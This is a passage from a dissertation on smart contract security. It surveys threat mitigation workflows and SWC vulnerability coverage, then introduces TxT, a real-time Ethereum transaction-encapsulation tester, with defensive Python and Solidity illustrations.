tack). Next, the filtered transactions are executed by the instrumented blockchain virtual machine
(e.g., EVM). The instrumented code passively observes the execution of the given transactions
and produces a special data structure called execution traces. Formally, an execution trace is a
path in a control flow graph (CFG) of a smart contract that describes the execution of a specific
transaction (or a sequence of transactions). The execution traces are then analyzed to produce a
human-readable report.
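    The filter, replay, and report steps can be sketched as follows. Everything here is a
simplified assumption: `Tx` is a hypothetical transaction record, `toy_contract` stands in for
contract code running on an instrumented virtual machine, and the trace is a list of visited
block labels rather than a path in a real CFG.

```python
from dataclasses import dataclass


@dataclass
class Tx:
    sender: str
    to: str
    value: int


def toy_contract(tx: Tx, trace: list) -> None:
    """Hypothetical contract logic; trace.append plays the role of VM instrumentation."""
    trace.append("entry")
    if tx.value == 0:
        trace.append("reject")
        return
    trace.append("deposit")
    if tx.value > 100:
        trace.append("large_deposit_event")
    trace.append("exit")


def trace_transactions(txs, target):
    """Keep only transactions sent to `target` and replay them, recording traces."""
    traces = []
    for tx in (t for t in txs if t.to == target):
        trace = []
        toy_contract(tx, trace)
        traces.append((tx, trace))
    return traces


def report(traces):
    """Render the traces as a human-readable report."""
    return [f"{tx.sender} -> {tx.to}: {' > '.join(path)}" for tx, path in traces]


txs = [Tx("0xA", "0xC", 0), Tx("0xB", "0xD", 5), Tx("0xA", "0xC", 500)]
traces = trace_transactions(txs, "0xC")
print("\n".join(report(traces)))
```

Note that the instrumentation only observes execution; it does not alter the outcome of the
replayed transactions.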
      EthScope [289] is a security analysis framework that detects suspicious smart contracts in three
steps: collecting related blockchain states, replaying transactions, and reporting data for manual
introspective analysis. Perez et al. [228] propose an automated execution tracing framework for
Ethereum for detecting both vulnerabilities and actual attacks exploiting these vulnerabilities.
DEFIER [264] is a tool that uses Ethereum transaction tracing to investigate attack instances
associated with Ethereum decentralized applications (DApps). Horus [120] is an execution
   38
      Ethereum has two types of accounts: smart contract account and externally owned account (EOA). Both EOAs
and smart contract accounts can be referenced by their 160-bit public addresses.
tracing framework for the detection and investigation of attacks on smart contracts that uses
logic-based and graph-based analyses of Ethereum transactions. Another execution tracing solution is
E-EVM [224], which performs emulation and visualization of smart contracts.
                     Figure 4.9: Workflow of the execution tracing core method.
4.5.7: Code Synthesis Workflow
The code synthesis methods produce the source code or bytecode of a smart contract with or without
a template. The objective of code synthesis methods is to produce a smart contract resistant to spe-
cific attacks or vulnerabilities. Fig. 4.10 shows the workflow of the code synthesis core method. We
observe that some code synthesis solutions produce code from specifications only; others require
a template to apply specifications to (e.g., ContractLarva [112]). Custom source code annotations
are an example of specifications, as we can see in Cecchetti et al. [84].
    Some code synthesis solutions utilize language BNF grammars or custom code libraries (e.g.,
SafelyAdministrated [156] and OpenZeppelin Contracts [33]) to aid the process. The result of code
synthesis is the source code or bytecode of a smart contract with specific security properties. In
addition, some threat mitigation solutions utilize the code synthesis core method to patch vulnerable
smart contracts on the bytecode level (e.g., SmartShield [305]).
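    As a rough illustration of specification-driven synthesis, the sketch below turns a finite
state machine description into Solidity source text in which every function is guarded by a
state check. It is a hypothetical generator written for this discussion and does not reproduce
the output of FSolidM or any other cited tool; the function name `synthesize` and the emitted
contract layout are assumptions.

```python
def synthesize(name, states, transitions):
    """Emit Solidity source for an FSM.

    transitions: list of (function_name, from_state, to_state) tuples.
    """
    undeclared = {s for _, src, dst in transitions for s in (src, dst)} - set(states)
    if undeclared:
        raise ValueError(f"undeclared states: {sorted(undeclared)}")
    lines = [
        "pragma solidity ^0.8.0;",
        f"contract {name} {{",
        f"    enum State {{ {', '.join(states)} }}",
        f"    State public state = State.{states[0]};",
        "",
        "    modifier inState(State expected) {",
        '        require(state == expected, "invalid state");',
        "        _;",
        "    }",
    ]
    for fn, src, dst in transitions:
        lines += [
            "",
            f"    function {fn}() external inState(State.{src}) {{",
            f"        state = State.{dst};",
            "    }",
        ]
    lines.append("}")
    return "\n".join(lines)


source = synthesize("Auction", ["Open", "Closed"], [("close", "Open", "Closed")])
print(source)
```

Because every generated function can only run in its declared source state, calls made in an
unexpected order revert, which is the kind of security property such generators aim to
guarantee by construction.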
                     Figure 4.10: Workflow of the code synthesis core method.
4.5.8: Transaction Interception Workflow
A blockchain network is a set of peer-to-peer (P2P) nodes. In this type of workflow, we assume
that each node maintains a complete copy of the blockchain, i.e., we assume that the blockchain node
is a full node. Furthermore, each node has a transaction pool, which is a queue of transactions that
are candidates for addition to the blockchain. Transaction interception methods are dynamic approaches
that read submitted transactions from the transaction pool of the blockchain node and prevent the
node from including unsafe transactions in the blockchain. Fig. 4.11 shows the general workflow of
the transaction interception core method. Transaction interception methods employ blockchain
P2P node instrumentation, which means that custom code is injected into the routines
responsible for transaction ordering or smart contract execution. All the transaction interception solutions
surveyed in this work also produce a human-readable report of their operation, which is reasonable:
deleting transactions from the pool is a deep intervention into the blockchain network protocol, so
it must leave a log of the action.
    Transaction interception solutions, although not numerous, exhibit a diverse spectrum of ap-
proaches. SODA [94] is a transaction-interception framework for EVM-compatible platforms that
allows users to develop custom apps for dynamic defense against attacks. ÆGIS [117] is another
transaction interception solution that uses a committee of voting security experts to create and ap-
prove attack patterns that steer transaction interception by instrumented nodes. Another transaction
interception solution is EVM* [203], which monitors overflows and timestamp bugs.
                 Figure 4.11: Workflow of the transaction interception core method.
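    The interception workflow can be sketched with a toy node whose block-building routine is
instrumented with a safety check. This is a minimal illustration under our own assumptions:
the `InstrumentedNode` class, the `Tx` record, and the value-threshold policy are hypothetical
and do not correspond to the interfaces of SODA, ÆGIS, or EVM*.

```python
from collections import deque
from dataclasses import dataclass


@dataclass
class Tx:
    sender: str
    to: str
    value: int


class InstrumentedNode:
    """Toy full node whose block-building routine consults a safety policy."""

    def __init__(self, is_unsafe):
        self.pool = deque()   # transaction pool: candidates for inclusion
        self.chain = []       # list of blocks, each a list of transactions
        self.log = []         # human-readable record of every intervention
        self.is_unsafe = is_unsafe

    def submit(self, tx: Tx) -> None:
        self.pool.append(tx)

    def build_block(self):
        block = []
        while self.pool:
            tx = self.pool.popleft()
            if self.is_unsafe(tx):
                self.log.append(f"dropped {tx}")  # interception leaves a log entry
                continue
            block.append(tx)
        self.chain.append(block)
        return block


# Hypothetical policy: treat unusually large transfers as unsafe.
node = InstrumentedNode(is_unsafe=lambda tx: tx.value > 1000)
node.submit(Tx("0xA", "0xC", 10))
node.submit(Tx("0xB", "0xC", 5000))
node.submit(Tx("0xA", "0xD", 1))
block = node.build_block()
print(block, node.log, sep="\n")
```

In a real deployment the policy would inspect the execution of the transaction rather than a
single field, but the control flow stays the same: check, drop or include, and log.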
4.6: Vulnerability Coverage
In this section, we compare threat mitigation solutions from the perspective of their ability to ad-
dress the known smart contract vulnerabilities. First, we select all the solutions that explicitly
declare the list of vulnerabilities they cover, 38 total, and translate the information about these
vulnerabilities into the model adopted by the popular SWC Registry [42]. Then we build the vul-
nerability map, presented in Table 4.3, which juxtaposes the threat mitigation methods by their
ability to address the 37 known smart contract vulnerabilities. The first column of the table has
the names of the threat mitigation solutions and corresponding references; if the names are not
available, we use the authors instead. The next 37 columns each correspond to the numbered SWC
Registry vulnerabilities. Thus, the table constitutes a compact map showing which vulnerabilities
are supported (i.e., defended against), which ones are partially supported, and which ones are not
supported at all for each of the 38 threat mitigation methods.
    The challenge of this approach lies in the fact that different threat mitigation solutions refer to
the same vulnerabilities using different names. Moreover, some solutions refer to a group of SWC
vulnerabilities as a single weakness. For instance, the SWC-100 [36] and SWC-108 [38] vulnerabilities
are often treated as a single vulnerability called the “private modifier”, as we can see in
SmartCheck [267] and in SolidityCheck [301]. Some other solutions do the opposite: they break down
a single SWC vulnerability into several fine-grained subgroups. Rodler et al. [240] declare the
coverage of three vulnerabilities, which correspond to the single reentrancy vulnerability in the
SWC Registry, viz., SWC-107 [37].
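    The translation into the SWC model can be thought of as a lookup from tool-specific names
to sets of SWC identifiers. The sketch below shows both directions of the mismatch: one name
that covers two SWC entries, and several names that collapse into one entry. The "private
modifier" mapping follows the text; the reentrancy variant names are placeholders that we
introduce for illustration and are not the names used by any tool.

```python
# Tool-specific vulnerability names -> SWC identifiers (keys are lower-case).
NAME_TO_SWC = {
    "private modifier": {"SWC-100", "SWC-108"},  # one name, two SWC entries
    "reentrancy variant a": {"SWC-107"},         # placeholder fine-grained names
    "reentrancy variant b": {"SWC-107"},
    "reentrancy variant c": {"SWC-107"},
}


def swc_coverage(declared_names):
    """Translate declared names into SWC identifiers; report names with no mapping."""
    covered, unmapped = set(), []
    for name in declared_names:
        ids = NAME_TO_SWC.get(name.strip().lower())
        if ids is None:
            unmapped.append(name)  # needs manual review before entering the map
        else:
            covered |= ids
    return sorted(covered), unmapped


covered, unmapped = swc_coverage(
    ["Private Modifier", "Reentrancy variant A", "Reentrancy variant B", "unknown weakness"]
)
print(covered, unmapped)
```

Names that cannot be mapped automatically are returned separately, reflecting the manual
effort that such a translation requires.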
    Table 4.3 demonstrates that different vulnerabilities receive unequal attention
from different threat mitigation solutions. For example, 24 solutions declare defense against
reentrancy (SWC-107 [37]), whereas none of the solutions declare defense against shadowing state
variables (SWC-119 [39]) or the RTL-override control character (SWC-130 [41]). Remarkably, we
observe that both the vulnerabilities receiving close attention from the existing threat mitigation
solutions and the ones overlooked by these solutions are often particularly challenging to
pinpoint.
Lessons Learned: By studying the vulnerability coverage by smart contract threat mitigation solu-
tions, we discovered that some vulnerabilities are covered by multiple threat mitigation solutions.
In contrast, many vulnerabilities are not covered by any solutions.
4.7: Trends and Perspectives
In this section, we discuss the emerging trends in smart contract threat mitigation (Section 4.7.1,
Section 4.7.2, Section 4.7.3), the overlooked types of smart contracts (Section 4.7.4), and the ne-
cessity for data-driven studies in smart contract security (Section 4.7.5). To avoid speculations
and opinion-based statements, we only make inferences based on our survey data and other strong
evidence.
Lessons Learned: By exploring trends and perspectives associated with smart contract threat
mitigation solutions, we discovered that there is substantial room for future work despite the
abundance of existing studies.
4.7.1: Dynamic Transaction Interception
Most smart contract threat mitigation solutions use predominantly static code-based detection ap-
proaches. However, we note that the focus of the research community is shifting in three major
directions:
   1. static approaches are shifting into the dynamic paradigm;
   2. the code-based methods are shifting into the transaction-based ones; and
   3. the detection methods are shifting towards verification.
Following these observations, it would be reasonable to suppose that the next generation of smart
contract threat mitigation solutions will likely continue exploring the primarily overlooked area of
vulnerability-agnostic dynamic transaction interception. We believe that there are two significant
reasons these methods are particularly promising: they are blockchain state-aware and can address
zero-day attacks.
              Table 4.3: Summary of the defense tools against smart contract vulnerabilities.
    Threat Mitigation Solution      Vulnerability (SWC Registry Number)†
                                    100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118
                                    119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136
    Oyente [200]                    #######                 #####                 #    ####################
    Securify [271]                  ####           #
                                                   G        ######                ########                 ############
    Mythril [215]                   #     ##       #        ##      #     #       #    #G
                                                                                        ###################
    Sereum [240]                    #######                 #############################
[Table (continued). Rows: Vandal [76], sGuard [220], ZEUS [168], ConFuzzius [119], VeriSmart [261],
SmarTest [260], Maian [223], ECFChecker [137], Osiris [269], FSolidM [205], ContractFuzzer [163],
MadMax [133], SmartCheck [267], ReGuard [193], ILF [146], NPChecker [280], EasyFlow [127],
Vultron [278], SolidityCheck [301], GasFuzz [202], SolAnalyzer [47], GasTap [49],
Momeni et al. [212], Harvey [291], sFuzz [221], Artemis [274], EthPloit [303], EthScope [289],
RA [100], SeRIF [83], Huang et al. [154], DefectChecker [93], ExGen [166], MythX [31].
Each cell marks full support, partial support, or no support.]
† Available at https://swcregistry.io/ and https://github.com/SmartContractSecurity/SWC-registry


      To demonstrate blockchain state awareness, consider the Ethereum smart contract Foo in
Fig. 4.12a, which transfers cryptocurrency funds to a smart contract Bar (Fig. 4.12b). Bar is
deployed on Ethereum Mainnet³⁹, but not on the Ropsten testnet⁴⁰. Moreover, Bar does not have any
payable functions⁴¹, and therefore it cannot accept incoming Ether. As a result, the transfer in line
6 (Fig. 4.12a) will fail and revert the entire transaction, but only on Mainnet, not on Ropsten.
Even if the states of all the variables of contract Foo on Ropsten are identical to their counterparts
on Mainnet, the behavior of the withdraw() function will be different. This example demonstrates
that the state of the blockchain is an important factor that determines the outcome of smart contract
execution. Unlike static methods, dynamic transaction interception methods consider the current state
of the blockchain and can therefore prevent failures such as the one illustrated in this example.
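The dependence on network state can be illustrated with a small Python model. This is only a sketch under simplifying assumptions: the names `MAINNET`, `ROPSTEN`, `can_receive_ether`, and `withdraw` are hypothetical, each network is reduced to a map from addresses to account kinds, and no real EVM semantics (gas, fallback functions, storage) are modeled.

```python
# Toy model (hypothetical names): a network is a map from address to account kind.
ADMIN = "0xEc125A03C6F9E75BEB1A420e94d655B2f1352584"

MAINNET = {ADMIN: "contract_without_payable"}  # Bar is deployed at this address
ROPSTEN = {}                                   # nothing deployed: a plain account

def can_receive_ether(network, address):
    """A plain account accepts Ether; a contract without payable functions rejects it."""
    return network.get(address, "plain_account") != "contract_without_payable"

def withdraw(network, foo_balance_wei):
    """Mimic the outcome of Foo.withdraw(): 'reverted' or 'ok'."""
    fee_wei = 1_000_000_000
    if foo_balance_wei < fee_wei or not can_receive_ether(network, ADMIN):
        return "reverted"  # the failed transfer reverts the whole transaction
    return "ok"

# Same contract code and same contract balance, different network state.
print(withdraw(MAINNET, 2_000_000_000))
print(withdraw(ROPSTEN, 2_000_000_000))
```

The two calls differ only in the network argument, which mirrors the point of the example: the code and variables of Foo are identical, yet the outcome is decided by what exists at the admin address on each network.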
      A recent study by Zhou et al. [309] reveals that novel (zero-day) smart contract attacks
constantly appear on Ethereum. This trend creates a major challenge: how can we defend against
attacks we do not yet know about? One way to address this problem is to use prevention methods
that enforce security properties instead of searching for flaws, attacks, and vulnerabilities.
Unfortunately, the security properties in static prevention solutions are tightly associated with
known attacks and vulnerabilities. For example, ECFChecker (STM-009) [137] is a prevention method
that verifies the “callback-free” property, which ensures the safety of a smart contract from the
family of reentrancy vulnerabilities. Such properties, however, might not be universal enough to
protect the smart contract from new vulnerabilities. One possible way to fill this gap is to verify
properties associated with the expected outcomes of smart contract functions instead of
vulnerability-related properties.
4.7.2: AI-driven Security
We identify another salient recent trend in smart contract threat mitigation solutions: AI-driven
approaches involving machine learning. There are two major reasons why these approaches can make
a significant contribution: they can cope with the expressiveness of modern smart contracts, and
they have already proven successful in securing other domains of computing [25, 63].
   ³⁹ Ethereum Mainnet is the major production Ethereum network supporting the Ether cryptocurrency.
   ⁴⁰ Testnets are alternative blockchain networks used for development and experiments. Testnets
normally execute the same protocols as production networks, but the test cryptocurrency on a testnet
does not have any market value.
   ⁴¹ A payable function allows cryptocurrency to be transferred (deposited) to the smart contract.

  1 contract Foo {
  2    function deposit() public payable {}
  3    function withdraw() public {
  4      address admin =
  5        0xEc125A03C6F9E75BEB1A420e94d655B2f1352584;
  6      payable(admin).transfer(1000000000 wei);
  7      payable(msg.sender).transfer(address(this).balance);
  8    }
  9 }
                     (a) smart contract Foo

  1 contract Bar {
  2     constructor() public { }
  3 }
                     (b) smart contract Bar
      Figure 4.12: A pair of smart contracts demonstrating the importance of the block state.
    The expressiveness of smart contracts limits the capacity of static and formal analytical methods.
Most modern smart contract platforms are Turing-complete, which allows contracts to implement
sophisticated algorithms using high-level programming languages, such as Solidity and Rust. However,
this expressiveness is a double-edged sword, as it creates a virtually infinite number of coding
possibilities, which are very hard to cover with static methods that predominantly rely upon
patterns. Although machine learning methods also rely upon some patterns, recent machine learning
models (e.g., those based on deep neural networks) can explore much higher-dimensional feature
spaces than static approaches.
    In the past few years, we have been observing a growing trend of using AI and machine learning
for security purposes, such as malware detection [244]. Although the machine learning methods
for smart contract threat mitigation have not yet gained considerable popularity, the flexibility and
universality of these methods will likely play an important role in smart contract defense.
4.7.3: Human-machine Interaction in Smart Contracts
Smart contracts are often contrasted with traditional user software on the grounds that they replace
human decisions with a deterministic algorithm. However, such a vision is overly idealistic because
a human is an integral part of the smart contract lifecycle. Specifically, humans write the source
code of smart contracts. Even in the case of automatically synthesized smart contracts, substantial
human intervention is still required for developing templates and specifications. Testing a smart
contract also requires a human, even for unit tests, which are themselves written by a human developer.
The security audit of a smart contract is also impossible without human judgment, despite the wide
variety of auditing tools available. Finally, interaction with smart contracts is always initiated by
a user, regardless of the degree of automation. Nevertheless, the impact of humans on the security of
smart contracts has not been sufficiently studied.
    The study of human-machine interaction in smart contracts has so far been limited to exploring
honeypots and revealing the potential for some social engineering attacks. Honeypots are malicious
smart contracts that entrap naive attackers who try to exploit a known vulnerability in a smart
contract, which makes honeypots a class of social engineering attacks, i.e., attacks targeting humans
as the major attack vector. HoneyBadger [270] is an automated tool that identifies such honeypots.
Ivanov et al. [158] expand the scope of social engineering attacks with two more categories: address
manipulation and homograph. However, these two efforts do not embrace the entire complexity of
human-smart contract interaction.
    One unexplored area of human-smart contract interaction is the security implication of the
growing population of smart contract users who do not have a deep knowledge of the working mechanics
of the blockchain and smart contracts. Another security-sensitive aspect of human-smart contract
interaction is the assumption that the decentralization of a blockchain implies the decentralization
of the applications (i.e., smart contracts) enabled by that blockchain. In reality, many smart
contracts implement routines (e.g., the Ownable parent class in OpenZeppelin Contracts [33]) that
grant excessive power to specified accounts. This excessive power may be abused by the owner or
stolen by an attacker [156] with potentially detrimental consequences. These two examples show the
importance of studying human-smart contract interaction from the security perspective, and we
envision many future studies in this area.


4.7.4: Non-Ethereum Contracts
As revealed in Section 4.4, the vast majority of the existing smart contract threat mitigation
methods target smart contracts on the Ethereum platform. However, in recent years, the world
has been experiencing major growth in the popularity of non-Ethereum smart contract platforms,
such as NEO [32], Hyperledger Fabric [53], EOS [27], and others. Our analysis of the evolution
of smart contract threat mitigation solutions clearly shows growing attention by the research
community to the security of non-Ethereum smart contracts. One reason for the disproportionate
attention to Ethereum, compared to other platforms, is that Ethereum is an open-data environment
with the second-largest market capitalization after Bitcoin, so it is both convenient and important
to study [229]. However, this focus comes at the expense of overlooking other major smart
contract platforms. At the same time, our analysis shows that it is often impossible to extrapolate
the lessons learned in Ethereum to the other platforms. Many of the existing vulnerabilities and
other security issues are directly related to the design of the Ethereum platform or the syntax of
Solidity, the most popular programming language for Ethereum smart contracts. Therefore, we
expect increased attention to non-Ethereum platforms in the future development of smart contract
threat mitigation research.
4.7.5: Large-scale Measurements
Although blockchain is an open-data environment, many facts and statistics about it remain unknown.
One reason is that a large amount of blockchain-related data, such as failed transactions
and ERC20 token prices, is stored outside of the blockchain. Moreover, the growing popularity of
Decentralized Finance (DeFi) has further intensified the exchange of off-chain data [29, 30]. As a
result, growing amounts of on-chain and off-chain data have not been analyzed from
a security perspective.
    Yet, the existing security-related measurement studies [117, 228, 270, 309] of smart contracts
do not give answers to all the important questions. Specifically, we identify two areas important
for the security of smart contracts in which there is no systematic data:
   1. the measurement and flow of the market value of non-cryptocurrency blockchain assets (e.g.,
      ERC20 tokens);
   2. the study of the purchases and sales of cryptocurrency and tokens by crypto exchanges,
      mining rewards, and crypto money laundering.
Such data would be very helpful for applying weights to attacks and vulnerabilities based on the
actual value flow of the smart contract assets.
4.8: Chapter Summary
We surveyed the full spectrum of smart contract threat mitigation solutions in this work. We pre-
sented a general taxonomy for the classification of such solutions, which applies to today’s methods
and is suitable for future methods, even if new paradigms, blockchain platforms, or vulnerabilities
appear. Using this taxonomy, we classified 133 existing smart contract threat mitigation solutions.
We identified eight distinct core defense methods employed by the existing solutions and developed
synthesized workflows of these core methods. We studied the ability of the existing smart contract
threat mitigation solutions to address the known vulnerabilities. We conducted an evidence-based
evolutionary study of smart contract threat mitigation solutions to outline trends and perspectives.
To further benefit the community of smart contract security researchers, users, and developers, we
deployed an open-source, regularly updated online registry for smart contract threat mitigation at
https://nick-ivanov.github.io/stmregistry/.


CHAPTER 5: CONTEXT-AWARE USER-CENTERED TRANSACTION TESTING⁴²
5.1: Introduction
Ethereum smart contracts have been used for a wide variety of decentralized applications, such as
decentralized finance (DeFi), non-fungible tokens (NFT), alternative currencies (based on ERC-20
tokens), and data attestation. However, numerous vulnerabilities and attacks on Ethereum smart
contracts have been hampering their widespread adoption [132, 255].
      Following the model of the Common Vulnerabilities and Exposures (CVE) database, the Smart
Contract Weakness Classification and Test Cases (SWC) registry [42] identifies 37 classes of known
smart contract vulnerabilities (as of January 2022). To counter the security threats, different types
of defense tools have been developed, including syntactic analyzers [206, 248], security scanners
based on symbolic execution [168, 200], fuzzing tools [119, 163], transaction analyzers [94, 240],
security libraries [33, 156], formal defense methods [83, 227], and various hybrid analysis
approaches [117, 309]. In this work, we scrutinize 106 existing smart contract security defense
solutions and find that each of them addresses only a few classes of known vulnerabilities. We
further discover that certain vulnerability types have never been effectively addressed by any of
the proposed defenses.
      Generally, every existing smart contract defense method makes two design choices: 1) heuristic
versus deterministic; and 2) detection versus verification (see Table 5.1). Heuristic approaches
apply best-effort judgement to all cases (e.g., ConFuzzius [119], sFuzz [221], Harvey [291]),
while deterministic designs guarantee correctness at the expense of rejecting a small number
of cases (e.g., KEVM [148], SeRIF [83], and eThor [248]). Detection tools identify known
vulnerabilities (e.g., Oyente [200], Securify [271]), while verification tools aim at confirming
various safety properties (e.g., VerX [230] and ZEUS [168]). The only known deterministic
verification approach is formal verification, which proves the correctness of smart contracts by
developing formal specifications for an automated prover [91]. Unfortunately, these specifications
cover only particular cases (e.g., reentrancy [83]). Consequently, formal verification approaches,
despite their guaranteed correctness, have very limited vulnerability coverage. To increase
vulnerability coverage, we propose a new approach for real-time deterministic verification of
Ethereum transactions.
   ⁴² This chapter is based on previously published work by Nikolay Ivanov, Qiben Yan, and Anurag
Kompalli titled “TxT: Real-Time Transaction Encapsulation for Ethereum Smart Contracts” published
in the IEEE Transactions on Information Forensics and Security (Volume: 18). DOI:
10.1109/TIFS.2023.3234895 [161]. © 2023 IEEE. Reprinted, with permission, from Nikolay Ivanov,
Qiben Yan and Anurag Kompalli “TxT: Real-Time Transaction Encapsulation for Ethereum Smart
Contracts” (paper and IEEE titles are the same), January 2023.

                  Table 5.1: Different design choices of smart contract defense.
                                                 Design choices
      Property                    Heuristic   Deterministic†   Detection   Verification†
      Reject option                   ✗             ✓              -             -
      Guaranteed correctness          ✗             ✓              -             -
      Confirm safety                  -             -              ✗             ✓
      Identify vulnerabilities        -             -              ✓             ✗
      † choices made in this work (TxT)
    In this work, for the first time, we propose the deterministic verification of Ethereum
transactions using a fully synchronized instrumented Ethereum Virtual Machine (EVM). Our verification
system relies on the user confirmation of a test transaction, as smart contract users generally have
reasonable expectations of the transaction outcomes. For example, if users purchase some tokens,
they would expect a balance increase of the respective token in the wallet. Unlike traditional
defense methods, our approach can cover a broad range of suspicious transactions, thereby revealing
the behaviors associated with a majority of known and unknown vulnerabilities.


TxT Transaction Testing: To make it possible to preview the result of one or several transactions,
we develop a smart contract testing framework called transaction encapsulation, which uses a fully
synchronized Ethereum node to execute transactions while preventing the propagation of these
transactions across the network. Transaction encapsulation classifies transactions into two
categories: σ-deterministic (with a guaranteed test result) and σ-nondeterministic (with a
non-guaranteed test result). To demonstrate transaction encapsulation, we implement a distributed
real-time transaction tester called TxT, which successfully reveals the unexpected outcomes
associated with the majority of known smart contract vulnerabilities, significantly outperforming
all existing defense methods. Our evaluation shows that TxT exhibits a low rate of
σ-nondeterministic transactions. To further reduce this rate, we enhance TxT functionality
to enable explicit detection of specific vulnerabilities in 75% of σ-nondeterministic transactions.
    To interact with the transaction framework, the user first connects their crypto wallet to a TxT
network and submits a transaction (or a sequence thereof) to the smart contract. Then, the user
observes in the wallet or dApp interface (if used) the exact outcome of the transaction(s), called
the a posteriori state, manifested in cryptocurrency balances, token balances, error messages, etc.
If the result of the test execution matches the expectations, the user switches their wallet back to
the Ethereum Mainnet and submits the transaction as usual. While the user is testing and submitting
transactions, TxT continuously checks in the background whether the condition for the replicability
of the test transaction execution path is still satisfied. Without requiring users to install new
software or learn contract programming, TxT allows everyday users to identify unexpected outcomes of
transaction sequences associated with the majority of known vulnerabilities, and it achieves a
vulnerability coverage that more than doubles the coverage of all the state-of-the-art defense
tools combined.
    In summary, we deliver the following contributions:
     • We propose a new deterministic approach for smart contract verification, transaction
       encapsulation, and design a distributed real-time dynamic transaction tester, TxT, to verify
       the security of transactions at runtime.
     • To address the time-of-check/time-of-use (TOCTOU) problem, we formally determine the
       exact set of conditions for the execution path replicability of a test transaction and
       implement TxT using a fully synchronized Ethereum node to perform the transaction
       encapsulation.
     • We reproduce 37 known smart contract vulnerabilities and confirm that TxT can intercept
       83.8% of them, compared to only 40.5% by all the existing methods combined. We further
       evaluate 1.3 billion Ethereum transactions and confirm that 96.5% of them are suitable for
       security evaluation by TxT.
5.2: Background
Ethereum, dApps, and Wallets: Ethereum is a decentralized blockchain ecosystem that supports
the execution of smart contracts. Ethereum popularized the notion of a decentralized application
(dApp), a full-stack software product with a web or mobile interface as a frontend and a smart
contract as a backend. In order for a dApp to interface with a smart contract and the Ethereum
network at large, it must use a wallet as an intermediary. Wallets securely store the private key(s)
for signing and submitting transactions on the user’s behalf.
Smart Contracts and Transactions: The Ethereum Virtual Machine (EVM) is the part of Ethereum that
executes smart contracts. As each transaction is executed by the EVM, the state of the blockchain
changes to reflect the executed transaction. However, if a given transaction is invalid, the EVM
reverts the blockchain to the state preceding this transaction. Essentially, an Ethereum transaction
is a state-changing instruction signed by the sender using their private key.
London Hard Fork and EIP-1559: There have been instances where Ethereum transactions were
included in blocks while paying very little or no gas fee at all. At block 12,965,000, a hard fork
implementing several new Ethereum features was activated on the network. Dubbed “London”,
this hard fork changed how fees are collected by the Ethereum network. Ethereum Improvement
Proposal 1559 (EIP-1559), enforced in the London fork, changes the fee model in a way that
practically prevents zero-priced transactions.
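The text above does not spell out the mechanism, so the following Python sketch follows the base-fee update rule as given in the public EIP-1559 specification rather than anything stated in this chapter. The function names `next_base_fee` and `is_includable` are hypothetical, and the sketch ignores the special initial base fee at the fork block, priority fees, and all other validity rules.

```python
# Constants as defined in the EIP-1559 specification.
BASE_FEE_MAX_CHANGE_DENOMINATOR = 8
ELASTICITY_MULTIPLIER = 2

def next_base_fee(parent_base_fee, parent_gas_used, parent_gas_limit):
    """Base fee (wei per gas) of the next block, derived from its parent block."""
    target = parent_gas_limit // ELASTICITY_MULTIPLIER
    if parent_gas_used == target:
        return parent_base_fee
    if parent_gas_used > target:
        # Block fuller than the target: raise the base fee by at least 1 wei.
        delta = max(
            parent_base_fee * (parent_gas_used - target)
            // target // BASE_FEE_MAX_CHANGE_DENOMINATOR,
            1,
        )
        return parent_base_fee + delta
    # Block emptier than the target: lower the base fee (rounded down).
    delta = (
        parent_base_fee * (target - parent_gas_used)
        // target // BASE_FEE_MAX_CHANGE_DENOMINATOR
    )
    return parent_base_fee - delta

def is_includable(max_fee_per_gas, base_fee):
    """A transaction must offer at least the block's base fee per unit of gas."""
    return max_fee_per_gas >= base_fee

print(next_base_fee(1000, 30_000_000, 30_000_000))  # full parent block
print(next_base_fee(1000, 0, 30_000_000))           # empty parent block
print(is_includable(0, 875))                        # zero-priced transaction
```

Because the decrease is rounded down, a positive base fee in this sketch never drops to zero (at 7 wei the computed decrease is already 0), so a transaction offering a zero fee per gas cannot satisfy the inclusion check.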


 1 contract Foo {
 2    function deposit() public payable {}
 3    function withdraw() public {
 4       address admin =
 5          0xEc125A03C6F9E75BEB1A420e94d655B2f1352584;
 6       payable(admin).transfer(1000000000 wei);
 7       payable(msg.sender).transfer(address(this).balance);
 8    }
 9 }
                       Figure 5.1: A smart contract that fails only on Mainnet.
 1 contract Bar {
 2    constructor() public { }
 3 }
Figure 5.2: A non-payable smart contract deployed on Mainnet at
0xEc125A03C6F9E75BEB1A420e94d655B2f1352584. The same address on the Ropsten testnet
is an externally owned account (EOA).
5.3: Motivating Example
Smart contracts do not operate in isolation; instead, they share a dynamic blockchain network
environment with other smart contracts. Moreover, the same blockchain platform can be represented
by several public blockchain networks, and the choice of network can affect the execution of the
same smart contract. Consider smart contract Foo in Fig. 5.1, which transfers funds to smart
contract Bar (Fig. 5.2). Bar is deployed on Mainnet, but not on the Ropsten testnet. Moreover, Bar
does not have any payable functions, and therefore it cannot accept incoming Ether. As a result, the
transfer in line 6 (Fig. 5.1) will fail and revert the entire transaction, but only on Mainnet, not
on Ropsten. Even if the states of all the variables of contract Foo on Ropsten are identical to
their counterparts on Mainnet, the behavior of the withdraw() function will be different. This
example demonstrates that the state of the blockchain (denoted σ) is an important factor that
determines the outcome of smart contract execution.
    Next, we run a set of experiments to determine whether the existing smart contract defenses
can reveal the failed transfer issue. We confirm that Securify [271], Oyente [200], Mythril [215],
Vandal [76], and Manticore [214] all fail to detect the issue, although some of them produce
unrelated warnings. This example shows that some vulnerabilities might not be detected by the
existing defense methods. Moreover, a security evaluation on a testnet does not offer sufficient
reassurance of contract safety. To address these issues, we propose a new defense approach for smart
contracts based on transaction testing. Our approach tests a transaction (or a series of transactions)
on an isolated fully synchronized node, and then checks in real time whether the test transaction
can replicate exactly the same execution path on Mainnet. Unfortunately, most existing smart
contract threat mitigation solutions do not take the state of the current environment into account.
The solution proposed in this work tests transactions against the current state of smart contracts
in the blockchain, thereby providing a more accurate representation of contract behaviors.
5.4: Preliminaries
In this section, we introduce the transaction encapsulation approach and give an overview of
the TxT tester, followed by the formal conventions, assumptions, and threat model.
5.4.1: System Overview
Transaction Encapsulation: In this work, we propose a new transaction encapsulation framework
that offers a preview of the result of a transaction against the current state of Mainnet, but
without propagating the transaction across the network or mining it. Transaction encapsulation
executes one transaction or a series of transactions on an instrumented node fully synchronized with
the Mainnet network. Unlike testnet simulations and symbolic executions, transaction encapsulation
enables the execution of the transaction on the current state of Mainnet. Transaction encapsulation
is designed not only to execute the transaction but also to deterministically reason whether the
transaction can be replicated on Mainnet with a completely identical execution path.
